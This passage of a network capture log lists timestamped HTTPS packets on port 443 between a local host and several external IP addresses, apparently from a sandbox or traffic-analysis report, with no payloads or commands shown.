Nov 29, 2024 12:28:10.644845009 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.644983053 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.645495892 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.645539045 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.645551920 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.645590067 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.645610094 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.645699978 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.645723104 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.645730972 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.645736933 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.645807981 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.645854950 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.645947933 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.645993948 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.646003008 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.646013021 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.646022081 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.646035910 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.646102905 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.646111965 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.646123886 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.646126032 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.646143913 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.646157980 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.646178007 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.646193027 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.646447897 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.646466970 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.650712013 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.650789022 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.651050091 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.651079893 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.651124954 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.651911020 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.652199984 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.652242899 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.652251959 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.652270079 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.652326107 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.672854900 CET	443	49819	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:10.673177958 CET	49819	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:10.673202038 CET	443	49819	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:10.673557997 CET	443	49819	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:10.674037933 CET	49819	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:10.674088955 CET	443	49819	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:10.674329042 CET	49819	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:10.683474064 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.683576107 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.683729887 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.683799982 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.683913946 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.683939934 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.684041023 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.684061050 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.684079885 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.684091091 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.684108973 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.684133053 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.684150934 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.684180021 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.684192896 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.684204102 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.684345007 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.712023973 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.712116957 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.712388039 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.712409973 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.712425947 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.712517023 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.712548018 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.719327927 CET	443	49819	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:10.745460987 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.745666981 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.745692015 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.745733023 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.745771885 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.745815992 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.745821953 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.745836973 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.745886087 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.745898008 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.745922089 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.745934963 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.745950937 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.745999098 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.746032000 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.746129990 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.746148109 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.746159077 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.746215105 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.775912046 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.775990009 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.776245117 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.776276112 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.776312113 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.776345015 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.776348114 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.776365042 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.776403904 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.776432991 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.776448965 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.776454926 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.776469946 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.776474953 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.776530027 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.776530027 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.776550055 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.776592970 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.776629925 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.776654959 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.776671886 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.776801109 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.776823997 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.776884079 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.777009010 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.777079105 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.777422905 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.777700901 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.777729988 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.777801037 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.777926922 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.777949095 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.777951002 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.777975082 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.778013945 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.778040886 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.778101921 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.778114080 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.778153896 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.778166056 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.778218031 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.778234959 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.778327942 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.778340101 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.778381109 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.778389931 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.778794050 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.801326036 CET	443	49820	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:10.802014112 CET	49820	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:10.802030087 CET	443	49820	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:10.802393913 CET	443	49820	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:10.802869081 CET	49820	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:10.802947998 CET	443	49820	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:10.803311110 CET	49820	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:10.810448885 CET	443	49818	20.110.205.119	192.168.2.8
Nov 29, 2024 12:28:10.810539007 CET	443	49818	20.110.205.119	192.168.2.8
Nov 29, 2024 12:28:10.810605049 CET	49818	443	192.168.2.8	20.110.205.119
Nov 29, 2024 12:28:10.812349081 CET	49818	443	192.168.2.8	20.110.205.119
Nov 29, 2024 12:28:10.812386990 CET	443	49818	20.110.205.119	192.168.2.8
Nov 29, 2024 12:28:10.845014095 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.847336054 CET	443	49820	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:10.976659060 CET	443	49825	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.976746082 CET	49825	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.977487087 CET	49825	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.977504015 CET	443	49825	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.978050947 CET	443	49823	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:10.979070902 CET	49823	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:10.979095936 CET	443	49823	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:10.980238914 CET	443	49823	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:10.980324030 CET	49823	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:10.982055902 CET	49823	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:10.982150078 CET	443	49823	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:10.987370014 CET	443	49824	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:10.989691019 CET	49824	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:10.989712000 CET	443	49824	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:10.990807056 CET	443	49824	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:10.990880013 CET	49824	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:10.991750956 CET	49824	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:10.991832972 CET	443	49824	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:11.034034967 CET	49823	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:11.034066916 CET	443	49823	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:11.034117937 CET	49824	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:11.034142017 CET	443	49824	204.79.197.219	192.168.2.8
Nov 29, 2024 12:28:11.040379047 CET	49825	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:11.040390015 CET	443	49825	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:11.082657099 CET	49824	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:11.082711935 CET	49823	443	192.168.2.8	204.79.197.219
Nov 29, 2024 12:28:11.147558928 CET	443	49819	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:11.150369883 CET	443	49819	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:11.151844025 CET	49819	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:11.152004957 CET	49819	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:11.152025938 CET	443	49819	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:11.416315079 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:11.416374922 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:11.416446924 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:11.417360067 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:11.417376995 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:11.422487974 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:11.422534943 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:11.422647953 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:11.422961950 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:11.422974110 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:11.429625034 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:11.429676056 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:11.429889917 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:11.430054903 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:11.430067062 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:11.554512978 CET	443	49820	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:11.554536104 CET	443	49820	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:11.554606915 CET	49820	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:11.554624081 CET	443	49820	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:11.555845976 CET	49820	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:11.555897951 CET	443	49820	13.107.246.40	192.168.2.8
Nov 29, 2024 12:28:11.555969954 CET	49820	443	192.168.2.8	13.107.246.40
Nov 29, 2024 12:28:11.629198074 CET	443	49826	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:11.629451036 CET	49826	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:11.629467010 CET	443	49826	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:11.629837990 CET	443	49826	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:11.630143881 CET	49826	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:11.630207062 CET	443	49826	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:11.630315065 CET	49826	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:11.675340891 CET	443	49826	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:11.958667040 CET	443	49825	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:11.958689928 CET	443	49825	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:11.958740950 CET	49825	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:11.958758116 CET	443	49825	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:11.958771944 CET	49825	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:11.958772898 CET	443	49825	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:11.958849907 CET	49825	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:11.959323883 CET	49825	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:11.959347010 CET	443	49825	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:11.962714911 CET	49830	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:11.962759018 CET	443	49830	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:11.962848902 CET	49830	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:11.963166952 CET	49830	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:11.963180065 CET	443	49830	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:12.168648005 CET	443	49826	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:12.168673992 CET	443	49826	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:12.168764114 CET	49826	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:12.168765068 CET	443	49826	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:12.168894053 CET	49826	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:12.170084000 CET	49826	443	192.168.2.8	23.96.180.189
Nov 29, 2024 12:28:12.170100927 CET	443	49826	23.96.180.189	192.168.2.8
Nov 29, 2024 12:28:12.629652977 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.630158901 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.630188942 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.630667925 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.631040096 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.631114006 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.631444931 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.675821066 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.675848007 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.679850101 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.680347919 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.680361986 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.680675983 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.681001902 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.681051016 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.681209087 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.689594030 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.689932108 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.689960957 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.690998077 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.691076040 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.691689968 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.691780090 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.691859007 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.722733974 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.722763062 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.739334106 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.749068022 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:12.749090910 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:12.800465107 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.245208025 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.245239019 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.245248079 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.245256901 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.245299101 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.245372057 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.245393991 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.245407104 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.245448112 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.254435062 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.254456043 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.254466057 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.254481077 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.254517078 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.254568100 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.254600048 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.254614115 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.254652023 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.306859970 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.306879997 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.306967020 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.306993008 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.307194948 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.314941883 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.315004110 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.331799030 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.331824064 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.331832886 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.331847906 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.331857920 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.331866980 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.331904888 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.331931114 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.331968069 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.332003117 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.364145994 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.364172935 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.364218950 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.364234924 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.364260912 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.364289999 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.372334957 CET	443	49828	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.372386932 CET	49828	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.383554935 CET	49831	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:13.383599043 CET	443	49831	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:13.383665085 CET	49831	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:13.383964062 CET	49831	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:13.383974075 CET	443	49831	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:13.385677099 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.385689974 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.385718107 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.385731936 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.385752916 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.385792017 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.385808945 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.385834932 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.392142057 CET	49832	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:13.392190933 CET	443	49832	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:13.392265081 CET	49832	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:13.392615080 CET	49832	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:13.392630100 CET	443	49832	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:13.394274950 CET	443	49829	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.394340038 CET	49829	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.430605888 CET	443	49830	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:13.430687904 CET	49830	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:13.435982943 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:13.436031103 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:13.436110020 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:13.436774969 CET	49833	443	192.168.2.8	4.175.87.197
Nov 29, 2024 12:28:13.436793089 CET	443	49833	4.175.87.197	192.168.2.8
Nov 29, 2024 12:28:13.445600986 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.445625067 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.445681095 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.445710897 CET	443	49827	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:13.445729017 CET	49827	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:13.445755959 CET	49827	443	192.168.2.8	104.117.182.56
